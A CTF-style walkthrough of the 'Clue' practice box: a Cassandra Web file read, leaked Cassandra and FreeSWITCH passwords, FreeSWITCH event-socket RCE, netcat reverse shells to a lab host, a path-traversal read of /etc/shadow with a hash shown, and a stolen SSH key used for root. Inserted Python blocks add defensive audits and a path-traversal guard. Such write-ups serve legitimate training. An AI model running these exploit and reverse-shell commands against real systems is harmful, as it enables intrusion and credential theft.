OSCP practice box: Clue
Key points (file read + password read from a config file + authenticated RCE + sudo privilege escalation)
1. nmap scan
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 192.168.163.240 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-14 08:44 EDT
Nmap scan report for 192.168.163.240
Host is up (0.23s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 403 Forbidden
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3000/tcp open http Thin httpd
|_http-server-header: thin
|_http-title: Cassandra Web
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m36s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-03-14T12:45:20
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: clue
| NetBIOS computer name: CLUE\x00
| Domain name: pg
| FQDN: clue.pg
|_ System time: 2024-03-14T08:45:21-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.74 seconds
2. user priv
2.1 Cassandra Web file read vulnerability
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit cassandra
---------------------------------------------------------------------------------------
Exploit Title
---------------------------------------------------------------------------------------
Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow
Cassandra Web 0.5.0 - Remote File Read
---------------------------------------------------------------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m linux/webapps/49362.py
Exploit: Cassandra Web 0.5.0 - Remote File Read
URL: https://www.exploit-db.com/exploits/49362
Path: /usr/share/exploitdb/exploits/linux/webapps/49362.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/Desktop/49362.py
##
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py
usage: 49362.py [-h] [-p PORT] [-f] [-n NUMBER] target file
49362.py: error: the following arguments are required: target, file
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.163.240 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:106:113::/nonexistent:/usr/sbin/nologin
cassandra:x:107:114:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
cassie:x:1000:1000::/home/cassie:/bin/bash
freeswitch:x:998:998:FreeSWITCH:/var/lib/freeswitch:/bin/false
anthony:x:1001:1001::/home/anthony:/bin/bash
2.2 Trying to read the id_rsa private keys via the file read vulnerability
## Reading the private keys fails:
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.163.240 /home/cassie/.ssh/id_rsa
Failed to read /home/cassie/.ssh/id_rsa (bad path?)
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.163.240 /home/anthony/.ssh/id_rsa
Failed to read /home/anthony/.ssh/id_rsa (bad path?)
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.163.240 /root/.ssh/id_rsa
Failed to read /root/.ssh/id_rsa (bad path?)
2.3 Reading the Cassandra username and password:
## Cassandra Web has no login page:
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.207.240 /proc/self/cmdline
/usr/bin/ruby2.5/usr/local/bin/cassandra-web-ucassie-pSecondBiteTheApple330
## Note here: the credential is cassie:SecondBiteTheApple330 (drop the first character in front of each value)
2.4 Reading the FreeSWITCH password: FreeSWITCH has a known RCE vulnerability:
## Reading the FreeSWITCH password
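The fused string above is an artefact of how /proc/&lt;pid&gt;/cmdline is stored: argv fields are separated by NUL bytes, which the file-read output silently drops, so "-u", "cassie", "-p" and the password run together. The following is an added example, not code from this write-up: it parses the raw file the way a local audit would and flags passwords passed as process arguments (the sample bytes are constructed from the output above; the list of secret-carrying flags is an assumption).

```python
import os

# Constructed sample: the bytes the kernel returns for the cassandra-web
# process seen above (argv fields are NUL-separated, trailing NUL included).
SAMPLE_CMDLINE = (
    b"/usr/bin/ruby2.5\x00/usr/local/bin/cassandra-web\x00"
    b"-u\x00cassie\x00-p\x00SecondBiteTheApple330\x00"
)

# Assumed list of flags that conventionally carry a password or token.
SECRET_FLAGS = {"-p", "-P", "--password", "--pass", "--token", "--secret"}


def parse_cmdline(raw: bytes) -> list[str]:
    """Split raw /proc/<pid>/cmdline bytes into argv (empty trailing field dropped)."""
    return [f.decode("utf-8", "replace") for f in raw.split(b"\x00") if f]


def fused_view(raw: bytes) -> str:
    """What a text-based file read shows once the NUL separators are discarded."""
    return raw.replace(b"\x00", b"").decode("utf-8", "replace")


def find_secret_args(argv: list[str]) -> list[tuple[str, str]]:
    """Return (flag, value) pairs where a secret is passed as an argument."""
    hits = []
    for i, arg in enumerate(argv):
        if arg in SECRET_FLAGS and i + 1 < len(argv):
            hits.append((arg, argv[i + 1]))            # -p VALUE
        elif "=" in arg and arg.split("=", 1)[0] in SECRET_FLAGS:
            hits.append(tuple(arg.split("=", 1)))       # --password=VALUE
        elif arg.startswith("-p") and len(arg) > 2 and not arg.startswith("--"):
            hits.append(("-p", arg[2:]))                # -pVALUE (getopt style)
    return hits


def audit_running_processes() -> list[tuple[int, str, str]]:
    """Scan /proc on a Linux host; returns (pid, flag, value) for every hit."""
    if not os.path.isdir("/proc"):
        return []
    findings = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                argv = parse_cmdline(fh.read())
        except OSError:
            continue  # process exited or cmdline not readable
        findings += [(int(pid), f, v) for f, v in find_secret_args(argv)]
    return findings
```

Any hit from audit_running_processes is a secret that every local user can read through /proc, so it belongs in a permission-restricted config file or environment instead.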
https://inextrix.atlassian.net/wiki/spaces/ASTPP/pages/5572241/How+to+change+FreeSWITCH+event+socket+password
https://www.cnblogs.com/garvenc/p/freeswitch_learning_xml_configuration_file.html
## Credential path:
/etc/freeswitch/autoload_configs/event_socket.conf.xml
##############
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit FreeSWITCH
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m windows/remote/47799.txt
Exploit: FreeSWITCH 1.10.1 - Command Execution
URL: https://www.exploit-db.com/exploits/47799
Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/Desktop/47799.txt
##
┌──(root㉿kali)-[~/Desktop]
└─# mv 47799.txt 47799.py
┌──(root㉿kali)-[~/Desktop]
└─# python 49362.py 192.168.207.240 /etc/freeswitch/autoload_configs/event_socket.conf.xml
<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="0.0.0.0"/>
<param name="listen-port" value="8021"/>
<param name="password" value="StrongClueConEight021"/>
</settings>
</configuration>
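An added audit check, not part of this write-up, for the event_socket.conf.xml just read: it flags the settings that left port 8021 reachable from the network with the password as the only gate, and carries a hardened copy beside the weak one. Assumptions: ClueCon is FreeSWITCH's shipped default ESL password, apply-inbound-acl (e.g. value loopback.auto) is the parameter that restricts which clients may even attempt authentication, and the hardened password is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed copy of the config read from the box above (the weak one).
WEAK_CONF = """<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="0.0.0.0"/>
<param name="listen-port" value="8021"/>
<param name="password" value="StrongClueConEight021"/>
</settings>
</configuration>"""

# Same file hardened: loopback only, inbound ACL, long random password (placeholder).
HARDENED_CONF = """<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="127.0.0.1"/>
<param name="listen-port" value="8021"/>
<param name="apply-inbound-acl" value="loopback.auto"/>
<param name="password" value="REPLACE-WITH-32-RANDOM-CHARS-xxxxxx"/>
</settings>
</configuration>"""

DEFAULT_PASSWORD = "ClueCon"  # FreeSWITCH's shipped default ESL password


def load_params(xml_text: str) -> dict[str, str]:
    """Return {param name: value} for every <param/> in the file."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): p.get("value", "") for p in root.iter("param") if p.get("name")}


def audit_event_socket(xml_text: str) -> list[str]:
    """List weak settings; an empty list means every check passed."""
    params = load_params(xml_text)
    findings = []
    listen_ip = params.get("listen-ip", "")
    if listen_ip not in ("127.0.0.1", "::1"):
        findings.append(f"listen-ip {listen_ip or '(unset)'} exposes ESL beyond loopback")
    if "apply-inbound-acl" not in params:
        findings.append("no apply-inbound-acl: anyone reaching the port may attempt authentication")
    pw = params.get("password", "")
    if pw == DEFAULT_PASSWORD:
        findings.append("password is the shipped default ClueCon")
    elif DEFAULT_PASSWORD.lower() in pw.lower():
        findings.append("password is a variation of the default ClueCon")
    if len(pw) < 16:
        findings.append("password shorter than 16 characters")
    return findings
```

Once a client authenticates, ESL executes api commands by design, so the password is effectively a shell credential for the freeswitch user and the listener should never face the network.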
### Note the password StrongClueConEight021 and change the password in the exploit code accordingly:
## Use the RCE vulnerability to get a shell:
┌──(root㉿kali)-[~/Desktop]
└─# python 47799.py 192.168.207.240 id
Authenticated
Content-Type: api/response
Content-Length: 63
uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)
########
## Reverse shell:
┌──(root㉿kali)-[~/Desktop]
└─# python 47799.py 192.168.207.240 'nc 192.168.45.214 3000 -e /bin/bash'
Authenticated
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 3000
listening on [any] 3000 ...
192.168.207.240: inverse host lookup failed: Unknown host
connect to [192.168.45.158] from (UNKNOWN) [192.168.207.240] 44456
python3 -c 'import pty;pty.spawn("bash")'
freeswitch@clue:/$ id&ifconfig
id&ifconfig
[1] 1581
uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.207.240 netmask 255.255.255.0 broadcast 192.168.207.255
ether 00:50:56:ba:f3:c8 txqueuelen 1000 (Ethernet)
RX packets 7602 bytes 723159 (706.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8643 bytes 865317 (845.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 812 bytes 103016 (100.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 812 bytes 103016 (100.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
[1]+ Done id
freeswitch@clue:/$
3. root priv
### Switch to user cassie using the Cassandra credentials cassie:SecondBiteTheApple330
freeswitch@clue:/tmp$ su cassie
su cassie
Password: SecondBiteTheApple330
cassie@clue:/tmp$ sudo -l
sudo -l
Matching Defaults entries for cassie on clue:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cassie may run the following commands on clue:
(ALL) NOPASSWD: /usr/local/bin/cassandra-web
## Start a local listener
cassie@clue:/var/lib/freeswitch$ sudo /usr/local/bin/cassandra-web -B 0.0.0.0:5555 -u cassie -p SecondBiteTheApple330
< -B 0.0.0.0:5555 -u cassie -p SecondBiteTheApple330
I, [2024-03-24T06:54:01.329180 #1612] INFO -- : Establishing control connection
I, [2024-03-24T06:54:01.405887 #1612] INFO -- : Refreshing connected host's metadata
I, [2024-03-24T06:54:01.411762 #1612] INFO -- : Completed refreshing connected host's metadata
I, [2024-03-24T06:54:01.412305 #1612] INFO -- : Refreshing peers metadata
I, [2024-03-24T06:54:01.413956 #1612] INFO -- : Completed refreshing peers metadata
I, [2024-03-24T06:54:01.413983 #1612] INFO -- : Refreshing schema
I, [2024-03-24T06:54:01.438174 #1612] INFO -- : Schema refreshed
I, [2024-03-24T06:54:01.438211 #1612] INFO -- : Control connection established
I, [2024-03-24T06:54:01.438417 #1612] INFO -- : Creating session
I, [2024-03-24T06:54:01.527357 #1612] INFO -- : Session created
2024-03-24 06:54:01 -0400 Thin web server (v1.8.1 codename Infinite Smoothie)
2024-03-24 06:54:01 -0400 Maximum connections set to 1024
2024-03-24 06:54:01 -0400 Listening on 0.0.0.0:5555, CTRL+C to stop
## Open another shell:
┌──(root㉿kali)-[~/Desktop]
└─# python 47799.py 192.168.207.240 'nc 192.168.45.214 8021 -e /bin/bash'
Authenticated
## High-privilege files can now be read and written:
cassie@clue:/$ curl --path-as-is http://127.0.0.1:5555/../../../../../../../../../../../../etc/shadow
<5555/../../../../../../../../../../../../etc/shadow
root:$6$kuXiAC8PIOY2uis9$LrTzlkYSlY485ZREBLW5iPSpNxamM38BL85BPmaIAWp05VlV.tdq0EryiFLbLryvbsGTx50dLnMsxIk7PJB5P1:19209:0:99999:7:::
daemon:*:18555:0:99999:7:::
bin:*:18555:0:99999:7:::
sys:*:18555:0:99999:7:::
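The --path-as-is flag makes curl send the ../ segments verbatim instead of squashing them client-side, so only the server can refuse them. Below is an added example, not the project's own code, of the check a static-file route should apply before opening anything; the static root and its files are constructed in a temporary directory.

```python
import os
import tempfile
from urllib.parse import unquote


class PathTraversal(Exception):
    """Raised when a requested path resolves outside the static root."""


def safe_join(static_root: str, url_path: str) -> str:
    """Resolve url_path under static_root; raise if the result escapes the root."""
    root = os.path.realpath(static_root)
    # Decode once (%2e%2e -> ..) so percent-encoded dots cannot slip past the check.
    requested = os.path.join(root, unquote(url_path).lstrip("/"))
    # realpath collapses ../ and follows symlinks, so a link inside the root
    # that points outside it is caught as well.
    resolved = os.path.realpath(requested)
    # commonpath also rejects a sibling such as /srv/static-evil for /srv/static.
    if os.path.commonpath([root, resolved]) != root:
        raise PathTraversal(url_path)
    return resolved


def serve(static_root: str, url_path: str) -> bytes:
    """Minimal static handler: returns the file bytes or raises PathTraversal."""
    with open(safe_join(static_root, url_path), "rb") as fh:
        return fh.read()


def demo() -> tuple[bool, bool]:
    """(normal file served, traversal blocked) against a constructed static root."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "public")
        os.makedirs(os.path.join(root, "js"))
        with open(os.path.join(root, "js", "app.js"), "w") as fh:
            fh.write("console.log('ok')")
        served = serve(root, "/js/app.js") == b"console.log('ok')"
        try:
            serve(root, "/../../../../../../../../../../../../etc/shadow")
            blocked = False
        except PathTraversal:
            blocked = True
    return served, blocked
```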
## After looking at Anthony's .bash_history, I know the root user probably has an authorized key that matches Anthony's private key.
## The commands show that anthony's public key was copied into root's authorized_keys:
cassie@clue:/$ curl --path-as-is http://127.0.0.1:5555/../../../../../../../../../../../../home/anthony/.bash_history
clear
ls -la
ssh-keygen
cp .ssh/id_rsa.pub .ssh/authorized_keys
sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys
exit
##
cassie@clue:/$ curl --path-as-is http://127.0.0.1:5555/../../../../../../../../../../../../home/anthony/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----
##
┌──(root㉿kali)-[~/Desktop]
└─# ssh -i id_rsa root@192.168.207.240
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 11 04:35:06 2022 from 127.0.0.1
root@clue:~# id
uid=0(root) gid=0(root) groups=0(root)
4. Summary:
## writeup
https://medium.com/@manhon.keung/proving-grounds-practice-linux-box-clue-c5d3a3b825d2
## cassandra hacktricks
https://book.hacktricks.xyz/v/cn/network-services-pentesting/cassandra